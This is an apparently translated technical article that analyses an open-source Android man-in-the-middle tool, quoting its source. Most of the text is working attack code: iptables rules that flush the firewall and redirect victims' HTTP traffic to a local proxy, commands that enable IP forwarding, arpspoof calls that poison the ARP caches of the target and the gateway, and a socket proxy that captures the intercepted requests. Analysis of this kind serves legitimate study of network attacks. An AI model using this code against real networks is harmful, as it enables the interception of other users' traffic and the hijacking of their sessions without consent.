0x00
The idea behind an Android man-in-the-middle attack is to hijack the conversation between a victim machine on the local network and the server. The victim machine and the server appear to be working normally, but their traffic has in fact been intercepted by the man in the middle. The process can be made clear with a diagram.
Data sent by the victim host first passes through the attacker. Data returned by the server also passes through the attacker before being forwarded to the victim host.
0x01
For an open-source Android man-in-the-middle attack example, see https://github.com/ssun125/Lanmitm. Here we mainly analyse the principle behind the session hijacking shown in that repository's effect preview.
Analysing the source of https://github.com/ssun125/Lanmitm, implementing the ARP spoofing attack takes four key steps:
1. Use iptables to forward packets with NAT

```java
public static final String[] PORT_REDIRECT_CMD = {
    "iptables -t nat -F",                                   // flush existing NAT rules
    "iptables -F",                                          // flush existing filter rules
    "iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",  // masquerade all forwarded traffic
    "iptables -P FORWARD ACCEPT",                           // default policy: allow forwarding
    // redirect incoming HTTP (TCP port 80) to the proxy running on this device
    "iptables -t nat -A PREROUTING -j DNAT -p tcp --dport 80 --to "
        + AppContext.getIp() + ":" + HttpProxy.HTTP_PROXY_PORT
};
```

These commands are run from the startHttpProxy method of the ProxyService class.
2. Enable IP forwarding so that the device forwards packets like a router

```java
private String[] FORWARD_COMMANDS = {
    "echo 1 > /proc/sys/net/ipv4/ip_forward",              // IPv4 forwarding
    "echo 1 > /proc/sys/net/ipv6/conf/all/forwarding"      // IPv6 forwarding
};
```

These are run from the onStartCommand method of the ArpService class.
3. ARP poisoning

```java
// Poison the target host's ARP cache: claim the gateway's IP as our own.
if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
    if (target_ip == null)
        target_ip = AppContext.getTarget().getIp();
    if (!target_ip.equals(AppContext.getGateway()))
        arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                + " -t " + target_ip + " " + AppContext.getGateway();
    else
        arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                + " -t " + AppContext.getGateway() + " " + target_ip;
    arpSpoof = new Thread() {
        @Override
        public void run() {
            ShellUtils.execCommand(arp_spoof_cmd, true, false);
        }
    };
    arpSpoof.start();
}
// Poison the gateway's ARP cache for the return direction.
if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
    arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
            + " -t " + AppContext.getGateway() + " " + AppContext.getIp();
    arpSpoofRecv = new Thread() {
        @Override
        public void run() {
            ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
        }
    };
    arpSpoofRecv.start();
}
```

This is also run from the onStartCommand method of the ArpService class.
4. On the attacker's machine, build a web server on top of plain sockets, similar in principle to implementing a simple web server with NanoHttpd.
Requests that the victim sends to the attacker can then be captured and displayed in the app's interface.
The core code is as follows:
```java
public class HttpProxy extends Thread {
    ......
    @Override
    public void run() {
        try {
            // Listen on the device's own address at the port the DNAT rule targets.
            mServerSocket = new ServerSocket();
            mServerSocket.setReuseAddress(true);
            mServerSocket.bind(new InetSocketAddress(AppContext.getInetAddress(),
                    HTTP_PROXY_PORT), BACKLOG);
            executor = Executors.newCachedThreadPool();
            while (!stop) {
                // Each redirected connection is handled on its own worker thread.
                Socket client = mServerSocket.accept();
                DealThread dealThread = null;
                switch (mProxyMode) {
                    case MODE_PROXY_SIMPLE:
                        dealThread = new SimpleDealThread(client, mOnRequestListener);
                        break;
                    case MODE_PROXY_DEEP:
                        dealThread = new DeepDealThread(client, mOnRequestListener);
                        break;
                }
                executor.execute(dealThread);
            }
        } catch (IOException e) {
            e.printStackTrace();
        } finally {
            if (mServerSocket != null) {
                try {
                    mServerSocket.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (executor != null) {
                executor.shutdownNow();
            }
        }
    }
    ......
}
```
Android Man-in-the-Middle Attack